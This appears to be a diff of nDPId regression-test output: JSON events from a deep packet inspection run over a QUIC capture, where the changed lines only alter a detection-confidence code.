00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496437543,"flow_last_seen":1621496437543,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496437543,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1621496437543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621496437543,"pkt":"AAAAAAAAAAQA+mr7CABFAAViYKNAAH4RaeQ0uxSvxkodT\/KiAbsFTtIIyv8AAB0IvPCERtRr\/7QAAEU0VDep\/CZnpIQa8eVhNyJ3U1QCAukLnPnKtOrC\/7zKB1G+98eg7ftwXdiCu4mjtl1Q8mNJOaDHQdHo\/ZnotZk2q+6WYBr5DXX5QHa13JOYGLxoc9qyOjz+jbwetc54i8U7+0kSHAbALiGoIDK5WQRRZWetkNux+DZoWjHY5WfosmGRQsxtOixsR3jt9j7FOo4uqSxQGhtqIeA0i25755C0K1hzCtZHRQuy55gnoUo6zZiPhelVtIcqgCilkIu+IaiAgPdY8qusu3Q9ASMkRkk0UX5H8nUY5fVDgGL4DjsJROTA71uUmNZenr0sr5JOl\/aDX74AH3H77h7yG8JDcWCMqta2iHG5v7LfQn6HD8EvX8A9+X1BPgSNN1do76JMe5qE+cL6FAAbPHwnyEKr00VkR3NF0Wj71jZ14VH7imUBnL66mFh+udQFwSu20vdM9c8XD4z8cDkFHoqTsPkKjRGkjCQi8gB1gYo0m\/YFj+JeaePbkDvq0OSLPaTj\/\/uR93wYJiwS6oC\/aiMrt4Ai7n7\/FG5FTHmyLQWtwhpvmSeJKiasDEobo8lDxko0INCDfgQfJ3SBS6Viiln\/ASliXjKWu4SrneUfwv6qaK5CsTzFRpoqdrt\/s\/4hApSQqHe2ymAF3JbfHyoRulU2oXzj3PnMlAj4Z4Vj4oik802VNCwqS9rwhkgwLpg2ForHv0BBRPYvL6MVNDpoeE6Q+fkjAsxQcCry3Tg\/0ntsyB77pU9N+6ViiIk\/seArDaEwUpWw96CaP6HGoEH+ITzRBw4NaVx1WIIOT111vCFZOdJbhxCcjcGlkWUXH2Mfa710gWwLlFOy8LDSs50FqSN\/OPohmIvSl5JLifaSN0t8gyVjvGme43FCNf1IRmz\/msB0elm4bS6ud+82racQS6O6aZIJmDUDJkR4HH9e\/YL1z+2ASyQ94Fzatzpb4GFKnXYPSRR9ZXr+nLzhoRIUWJY27XaWKYbXR\/JgJvZqSpd9j1Y9iIYmFAj\/kzwA1TDOawG0jmZJvOHRbLPdttFMT9Z8ICzQz7sbYr50LzOCpscApRYi0yCxCW+7FvKkaUxLEeqVZNTb5bfzGXSqygFSO8Onu18Vfr2pGmZ97fTY05vmeNRaTdGB9GDxEB+of1UDIaNk5S6UGJN8C0OX2skQW9hdlLAoFJbl3R\/kaaNQomNrWf12eVjbEPUwYduxDkiFO\/Cu3xI8s\/1bhAxAoo1eoosHRSb+RfuzYRRHXHaCwK0syV2XsapF5fct1hE0QKESIuGMqkYTacUhiZ+am2170YsnbIH6mCpW2GWX2kdp\/NRfot7wqoww4YL4kQ0dV2zP8iVLBMwBcBBj7jRlAJPmU94cd1+2yA9MIjBhwW2o6kySfxuLx1CH1XTXYxyDRbLVbIkYJ9KjklyMjtPqIcfNaglBMiG4bD+cmIuV+JVF2yBdmwLpupy8GkZrPVtTuFpepOJxWG
xrxdE4LNF44zdCZCWF5fsbh0tA\/4QNVZd3EvAFmb9igKxLlVrUdRexT5v0zY8qkBoP74MZTTSWxXbGUHSlroYRRVjE1ko2j801gomU8QxZIsnLdQPtAkZ1hEimDc88Y35XyX679476yZ\/aqcOmLMYDbu0Vw3kbH\/S1Pi\/Q6fIKsIvYN8tlqc6ZQKWv4iCbutDJNK0I1762s\/zDONmC7qcwhUo\/1eKb+bifa8jDvxqbQH5WTi1a8brNLoMOVpui\/c73ZoNVIkMLLnI\/xxYiZknhsfNiaQgxORr7sklMg7Kd\/f31pN0pVpaR"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496437543,"flow_last_seen":1621496437543,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496437543,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496437543,"flow_last_seen":1621496437543,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496437543,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1621496437852,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621496437852,"pkt":"AAAAAAAAAAQA+mr7CABFAAViYK5AAH4Radk0uxSvxkodT\/KiAbsFTi+oyv8AAB0IvPCERtRr\/7QAAEU0JaLtoHyofbRbg8jGkawveiyJ2UaoheXbSYuPTeMKCeIU77lABrfhjW\/KFsoqVpaP9JKJMlnvWCAfrhYhpHkJG+xvxdGDmZWYW6e1KGN5t8DibwD+sY7U6We2yL0NMOrSYyY67PZ33CEYMgrO+bU1ma8i3+NoKnZhxsjAkaglJ6uAUozF4XuimP6iU+KzggGtZ5AHeHRJJSrIijvm2uURkPI\/Zf52SGLY+vL4vQPTe7wS1EKJeXUmQgYmh2aup9vLeWlDTkRpMf1EwpwHNlukj5oBWVeoeBmaQD4sx+NuopJ+2QprYWTuKVJ508tJ6HgsW5Ot7jO5bBygYTExm8AhqCnq4UjBmnft2hLhbA7\/d3ydVpIp7qFrWPv9n07PW58yXrAf70XLdskX2QCxfb2EahbYmb3Vx+DoN9ZQfyauIGIQJ4G4xs7NSUBH1KpzLXiWyZKGC2bhtRyON+3HzPjWFxkL0Tfa80\/+SxEpgasrCwJQb+1o6V\/lNwqybT5vHn79PHBIvEpedoaDM+BEu+O79uo27iS8RNPO794dIBqh+wJSlgKlH5zeUshHAvvFJn1TFlqv8TRVbuRhgffiNiYg0o1CeqH6Zf28VhJJpbsJJD4AZ\/jSirQZxHEWJI7alxgK\/LiDdkgpKDEWpc3pue7siiUI86wkuQp3ziUbYYUwf+3S2XmN4C+TOxmkT5fxEIOXMUz4o9qBlMvVx+HeJXeP4+1XADUariBmhpvXNO6nl8VgSR05a2jc1zcSQm6hoH7Sjq19QDV7jFEfc7eLbvAvOLM23DWJ+wh4NpHj9pZdPlAmebA1IRONzVUDs+FLPzEH62RBEORoAtOT4e39cJai5gPk0i6dU0vofBLpifIxzMyKYaGd4qxHI1hU\/vumyHtthijttX3+DFdn3RYaqCp1LpOaUmoX\/6sMVu8m0LGWnwhQqFoSAeJsuv14Al7ULvCdbJM06GXHtuP8hOpztz8GERiD3IE4+pHtQzzeOFwW3gBxM8vb\/kgHuBEO3Ngo3tjKIHZU34x718MZS7qAptuEPHVkm+ESamOD7xBmeB3Lqe2ntH0yaZ0R1ojSk6QGp9l\/DQGTgYlqqmVVplJJS9Mq23y4sYJANTI+VTWYMkD6NqRCbwxSayYlRmpI0bsWTBa3Egd5P7LRpi+3cNo9ZuEhXIAF3ycXIYlhzeSYSYvtqmdmjkTzNQLLrulkQ5zCYRtkU4zvk\/g9mgS2CcfxLTk
jgtei6kwqIx3Nk4h0E0OZscgKCSJf4cRmCCOmfcnN0SQlWhChNjlpr8NXwxRXP\/99Mm1hVM9\/1cJQ8UoVQJDRNojN3SkiUl26oijeQfH807azHA\/97ACgXT19Mdl1O3NlO9Iz\/csL8LLesYa1qB5z+IjimX42W8TXFqTRlbQ7oeAmIc8H5U32U0xeqTwvh76ZUT0WO\/Hpn0xBlv6aqBcKb1Cxl7JTIzz67aCTV66YXN8NeR593i1+u0PvZCPySYf5PqAIuY3yAjXufep0Fzzko0vw1dgNNd1cSLqgPBALOXp4QpvYDsh5OdOzrPtb9Bwn8\/YjM65iU1fQJwe0pFgWPBk3OLAC1ivEA1X2opEADJmIj\/+8LvIdF6nYgzKjVtmvtV9atGouRJomruCL8JxrFfNeHoRpx0yRl9yU\/q2BGWdEuqEHO6y7Tbfu0SWUkh49LajcNcpvqE+bJljstNdRH3yFDQnBncwCCqj4zSbXWQeeQR2mI+3rqRgA1HwOB+cQZChDPCGByW10tu7BtVyE7\/y\/Y+sF"} 02320{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1621496438462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621496438462,"pkt":"AAAAAAAAAAQA+mr7CABFAAViYK9AAH4Radg0uxSvxkodT\/KiAbsFTjIVyf8AAB0IvPCERtRr\/7QAAEU0a1V3BXBwEIhDElH\/1qUxqcqfVK\/U+I3pv8jXB6GKoLcClwfi5i+JVRi\/+qOD0jSHpVm+CcmsqV2quEgqGH5Gn0rihcbJDGj870ULZI4KmDKfC69q5r6675Wy4U0x28m2t5DK6rGqmJIfuY4CLJ5+JpnAGepaot5zw988NS9MjaUUAwJq0KRJTk9TQLF3FkyUeCnv+L2\/mCZ4pQPvTUHoai0BPsJAkEBQbCDT0ne2qov3gwfXPyGYjT+qpU1DonWmFNb695dnTcteFv3XvXkEd58E8n7ydtguTKEpl548CM+1ZWTRyyMlXz4XZF8nSLIMx0GUIZgZvabVLDS2+F0B521wAlGhNrm8PRINe9rBVvQYcP4xgohRdv3nDuVcLpMwOSEXj4YWgyE3ZUgeAzYB\/H75MXEyWx2rB05U\/7TWZ7NlkA33O50sz9d4a2o1c3cNntoxGwlEfyLKcihZ\/Suz\/KxirS++R\/qp01ueSmHonRfmrrM1LSGcMyKd+Oc4e5KssoiJAFl2Nso9pSh\/Hc4LC0BNO2pv99cb2fqWMrvtg4RKbfx1R5ZiccoCxgCpi46Y\/bGbfrDImS2xG9ERCTD6jtG0jRR1KV9w3yPJD6dZUx9vPrSlfE7TRtUvV2tg2P8RQt\/NsSQk3\/7JpfMhAIPApofSUgXm0f7r+8Zw1J12aP1zZsU9ZyRmQPc6usI4DXJN8WSrOMAw2YJx5dHRsAS5bRsxti2UCq\/PcqbnjXZexpjegsnkWKYnN\/pwtZdssK+ny+99042hifAuhg\/BXmwZfuFZ7LWOinb0yOszMgV4GVujdcSyRmmJB+im4Mj4o509W5k04dZ0bDE52gnvESt2EXA8x4iUBeMzV1EC9VoL2Zd72WZ2Le8+\/S0MFe3Se8D\/liSQe5dY3M\/L+3ZXq\/9
nfvzioEORhqMqj8nSgClQeG9dmdKGgxM5mcQ9CeGNozwRdxhJvWFmctGZQ2NjWDhhDHDaqU259Q3FvsbElzHVdrJ5mJ0Cxf9ajFKPgkVOGdrDG9ApKtfsvTm8mcEa8n0Q62eOymCVJqvif5jaYy+ecjinMVsEogfItZgW86yqnm54hcKotzJtaFtp3CA5T0NjiL0VfXkiOTKfOXVWtwS2R+LPX1ibd8kfkwAh\/XXkesEqkGqJKfxtLjiY18HS1YhU3t6JkzeJqPLrJB\/PbFwyElYds\/6m0\/g+LOXOZ67UcdCScV0su9cTzTbpFuilpU31PFlGsAgDKmvkZLzN7jt\/kqOCXoWwgg9bPQkbwwNwl54A9eMPW3BHZk0poDKL2DWdoWQmTEsHc0pqdf\/k0atEtrhXPDE6dm9ctnyGia88NrHpejAS5iOiAf1eL4iWXQNTQkLKwlOqi0oh5WENqyW2gdD3O5vPNDr95MLc6Nk9E3B2M+6BndVVw6tTuGClOXozYuEVgbdPUEQGHunkA\/dCQkelRbanSo5cdvMQPWbxeU5G497tiSuxNDfmsujYTz\/BK6JWmejCS\/KhAJaMKx7PrcrPsaNqhZU4Mn4\/jSs11bYdbYsLm+pMXqsl9X68WqxfFniiajHo\/Fd3P7UYw9qKzJA5hFllxa12+AedgC513u0kPjxtExQUdI3b78Ms+FaM6UYc1IOQ6tYJC\/kR00xvH3J0uZZ0HafuTIIxCiV49M2ik73I2gkK\/TLa9hQf1LFJjsPj9VPpRxrc2Ly1SzJ7P1j6ovi9NMEeR\/e7+QcpnMJTH1C\/dGDgaTfjeelKzH0zIUwM4v73ZogzQ+Q6mOQCAb1RAyJQ"} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496439665,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496439665,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":136,"packets-processed":135,"total-skipped-flows":0,"total-l4-payload-len":182250,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":93,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":93,"total-idle-flows":92,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":420,"global_ts_msec":1621497523457} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1621497523457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621497523457,"pkt":"AAAAAAAAAAEA737VCABFAAViBEZAAH4RSb6okEAFI8KdL9kJAbsFTlfcy\/8AAB0IhCcF96VVR0wANwBlELxIAYrJ18RJAopwESH080EDiTGBxAUIotc1YUcdQDx6Fm+qNXboDChqvIPFhdQk4GOqHNpE\/bcP8275wY0w3P5\/OBD00jBZFIIxdkIc1CxBuDirFHD1tP5B64vwQ5D8UGBMCwXBE5r8cQBEBueMDl1wCzedkaTPJndcvmabltC3xUmd0wwNZF33vrM44e1g6fvolfFIRSR585LU+EPiXYcJSO8XezQCKfsKP9OZPhOtv83h2Ovh66Ofu5lyKK97w1ZRH4fHbdZfIN43raCsZSEISB1XWpjeStwCQgX4pxEVT3bu7OPulibsntpcBDvvUq8hjhYS\/PbA9GsLf8ab2oDiv9nzg4n5gSjTjYJYqGNdpo8pvu3k0XjbFxeoYR+3bONBa+e0\/V5cimHNpgKrVTimMaMMdAFaY6tT7OKkXataUcGKIOpI4ClrI1RfjXBlfZBLOZbQ1ruqGWnukjIXOQ89MmoF02WXH\/OXh+KKRAFzwlapiv\/cQ9QlO9JZ0BB+POvvg0IQYksHMghnQAgMTrJM4innxppRZzBoWz9zsOmK6XhRhELNfRCbi4bc5YsBdjiD3ijjj0vhvLYkE8cmxkLuJ0qhNxl3p6hz2KHodGMRRnCY7+yW4\/w95\/W2ZXETMOaiPG4P8rFj6ml8\/VAIeNI42nP1oow2vPc0sprOkAOau2yfl6UbQppTRhQbTZO9wnp0+pb\/YLR560RKcRxZ6gUiuP4fRQpX1VnT9F+IXXx+\/hKRHGdtC446mKetR0R2fffEU3RdpszGGUSJYY9vViq2Eomp2NB2XsGSDZ7grvOQePwuxkF\/VdXMAKr33SX3CCDNZsxfwsHeafmqicnZBNljaecFtLy\/+9HYZeH3f2cDOX3K2VDbGR9cx+8R4uBk0EX\/px+zKszwuAcjJAvJeXJiBBoZwb1OylfJtFW0xyteXH7T57KNedRu+91GNpzswbrgQyjlkhovo1OK0t72ahVmG3ci4ldbaNoM9Er9o1PA3dEHVxpZIkVGwMvOCLlkTsNn7BvKy8UOqhGyMtxMVZXmLf+vQAImY7kO\/JmvUFXGBjLGGoDqDl13TqPutG44hrxR02KIBhULXqIMEKZ0qrvWpm\/\/odFSsCLPU5KX8gvQDTeNqgXvhS5yCTtJ\/E1FTIQ62Whbkz803oSWqHMyB9PTWsfyUOvQ\/rOPfM2Hp8037xRyvZ557yfBRFUiv70NQLV2Zzve\/8q4\/+h+Fri1+bTl59+RUidiY1TO3qvxPwSqJrc\/iUXUAxTJ\/iVUXyZcuGGc8bsiOTTBgqyOg9Hj4pZ\/3cKkgSVM8pOpKr\/hPcaL1tH1m5MiC8PYtFySKzAit5RXN62RM\/yP3bFdJNWXn3q6vSa6Nwy+6UJmoWNwQrB89OTwcDbVLvIvUrUOYSdw5tw4rl8hCKo38y10qvUFE7S\/vxva\/p2Znrp2ZVkSxayvzUJu3VFimV
xiL3A7sYZs6c\/thutzyxZvCEQ2Ehf93l2gbRl7+GjjrhvbWDav5GzhJ32x7RnRqMQA6g7ihAB1sROsstlfmwTAaFrKCBAN7dq4qC4xFv28ox5F9z+6hjCXyOJStyP4WcjK+tovRhkLpdG2Wvd9PUpQyVc7n2VNtkJqiMlfYa2ialoeXEG2XlWpLp8Nvi5ARgJCTGZFWy91dkcCOz8sVye7XwnEDxu0kn98A2gCBLP47MxjqlsbBe\/36a444Y35PEcLtU3xUP\/8uuTpLZz8LGaII+NM3hazyvTcHrfjqZ0yk555T\/\/FaKekILXf"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621496437543,"flow_last_seen":1621496439665,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621496437543,"flow_last_seen":1621496439665,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498081522,"flow_last_seen":1621498081522,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498081522,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1621498081522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498081522,"pkt":"AAAAAAAAAAQA8lpWCABFAAViYQ5AAH4RYvGfdbB8xkodT+8SAbsFTkZmwf8AAB0ItDBJ3NIuqUkAAEU0zVGaIK6UyDHeyNAcp56wwNTOdBKN2bGwgH3tSTiVxSqi5R4I7f3uL1yCaFlIdaYH9ahQKvndRKo\/ujk3\/jxfEcgto9i3futX9okj4XQ27PcefMGWgXqyEVg4FX77CSecDnTaNTLYfhgkDYQuCO970H4hixxovH+9p7Rv9dvjx2i\/DEJUGfnU896aVLuBnPuODO552k7IJaY3oWgEK0rlPQEiGu8iNHDYQvoHxEBatHMnsyOw8Zigvseo1jujk6RJI1A1aOg7YO9cAhzx\/u6chL22xzxaN0rZh\/N0XhIF0NwNbCTSv0YxaADYXS+ZMZCfG7i\/c1SF\/TLgIw2\/Cpu3F3+\/J3snQsx2Ypa323eXtmuMVPdZd7ZS0JAerklF6xQ2sS1MAkHYoaZwJeMEuKsLN21trT43ZhRptSf2u\/vwUGzprigY38cgmz2P0F11GVoj57z4wh7UcQjKtTWJ2849\/MydU8igJwJBLHMPRTXx3H\/BMY\/XLs5QxfEEe2tglHiHmbbq4PzWF3eT6ivMr1fu4KfSTFrTevi80ysJLj74VjHcpduKqVQEAr3Nrxo29\/LtT2\/2SjRuE1\/QZ3jNaoc+VKacJ1OxFmMjy6MGm5g4zuGOU4PfB50I\/VqTXCdTlUAmTY7aw9cTfWQym2+3JjrSCgWg2UbNSgsB3L2is4KZ\/0e1da4EhbjUCPTE2G4aoj83FMSovFWop7f5UAVm40K7Ty5x83R2EbPCd85UuGSIQ2TY5rEz31oaGw7pNUiRlzOkMPY\/3kFEfS4kT75iAaOiXzSFUXwVh+46V1ZvA3YWe8YCrMaHZgPxkOMYQixK5m4kE
4DpD+kTtbvG+rGsitiIx92TiXWXi\/RueKekCBAIO6DDqnNSDioHQ1qgtwcpgfVl0ej2qxMeg3DrsiZDxeOV77mCA0L84J68iQzb1jxQzp5GdP+Apo6zOF9Td3oDYFxp1\/2YnjbYkDZQumseur2wImpbnrAdoRFORnbxALxWRA1dZjITPJHmekQRA4kxEp7\/Z97odl+ObDogC\/\/cAhnq4DfOJz00T4RdEcO081yUNcS\/FEvbg7B9sbjDCedDS\/stwrNGitySwmE3scR+aZKyKBtqHCMiWVQOhXlWVUJyKHlfU1lb6W5mDBMyxAaJZZTfI8GB+zZV2rexPCKIqBy5N0iq6rwIiMUn5CKijk2bKXIzCqSDbqrJxJnrHf0vns3v74qpefAZDni0SOFc+2DykFX6NEtdNgoW92KE\/mvxeaIXMyLuEr1rBY8P21x+u9Hj4lI28mV2TP+OvII1F78tH5muJnBp38Ls4t00WNUM5qvDRCPn\/qCJOJupXtqxmax1I5E+sxFqbI2+QyiNd1xNWeS7bPXPPjVGS6cu9MwsecO+R9Qv\/1VhgxscP2kZ797YzaYhjw8bmnZS2O1uUm9CvlrYQdUxSRwLgY\/jIY2w8pvuF\/hO7kVAMYVHGPH+IQO1SY77GbyF4u4k4xFwBDkhIKR\/nOX3lmm4FtHy0hlq\/6nXLfGvIypcoaMaaBFB9hx0m5XnnTxSnIC1vhW1FDclKSyzUy\/ddRX22aL8vOR30NpJH4RlJ6ueGVM641FEst\/rh1nK6cglWyn3\/dXRMIw7QDsXh1ijz9s95X0SsUD8hNmRuTzlhnVPs0rxOtkDr0ojHFIvCB+gp4SNVj0YldDojIlR0\/3Dn7VAGDCem9vEBUBT2YeMkbsNoFcGF9yx+tHZxAZUN6i3I67NHiOw\/T+jxUqj\/K95lSH+zdgQfLf